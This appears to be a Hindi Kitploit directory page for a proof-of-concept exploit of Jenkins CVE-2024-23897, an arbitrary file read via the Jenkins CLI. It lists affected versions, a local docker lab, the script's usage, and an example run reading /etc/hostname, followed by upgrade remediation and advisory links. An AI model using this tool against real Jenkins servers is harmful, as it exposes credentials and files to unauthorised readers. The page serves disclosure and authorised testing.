Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Jenkins-CVE-2024-23897 — Jenkins CVE-2024-23897 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

Jenkins CVE-2024-23897 के लिए PoC

रिपॉजिटरी देखें
112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Jenkins CVE-2024-23897 PoC

CVE-2024-23897 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC), जो जेनकिंस के बिल्ट-इन कमांड लाइन इंटरफ़ेस (CLI) में एक मनमाना फ़ाइल पढ़ने की कमजोरी है। यह Overall/Read अनुमति वाले अप्रमाणित हमलावरों को जेनकिंस कंट्रोलर फ़ाइल सिस्टम पर मनमानी फ़ाइलें पढ़ने की अनुमति देता है।

प्रभावित संस्करण

  • जेनकिंस संस्करण <= 2.441
  • जेनकिंस LTS संस्करण <= 2.426.2

एक कमजोर इंस्टेंस सेट करें

docker compose का उपयोग करके एक स्थानीय कमजोर इंस्टेंस चालू करें:

root@kitploit:~
cd docker
docker compose up -d

इंस्टेंस http://localhost:1234 पर उपलब्ध होगा

शोषण

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

उदाहरण

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

स्क्रिप्ट को समवर्ती और कनेक्शन टाइमआउट के कारण बड़ी फ़ाइलें पढ़ने में समस्या हो सकती है। अधिक तकनीकी विवरण और कमजोरी के वॉकथ्रू के लिए मेरे ब्लॉग पोस्ट पर एक नज़र डालें।

सुधार

  • जेनकिंस 2.442 या LTS 2.426.3 में अपग्रेड करें
  • जेनकिंस सुरक्षा सलाह में वर्णित अस्थायी समाधान लागू करें।

संबंधित लिंक

  • Sonar Source | अत्यधिक विस्तार: जेनकिंस में महत्वपूर्ण सुरक्षा कमजोरियों का पता लगाना
  • जेनकिंस सुरक्षा सलाह - 2024-01-24
  • Qualys ThreatPROTECT | जेनकिंस कोर रिमोट कोड निष्पादन कमजोरी (CVE-2024-23897)
  • CVE-2024-23897: जेनकिंस मनमाना फ़ाइल लीक कमजोरी के प्रभाव का आकलन – Horizon3.ai
टूल डाउनलोड करें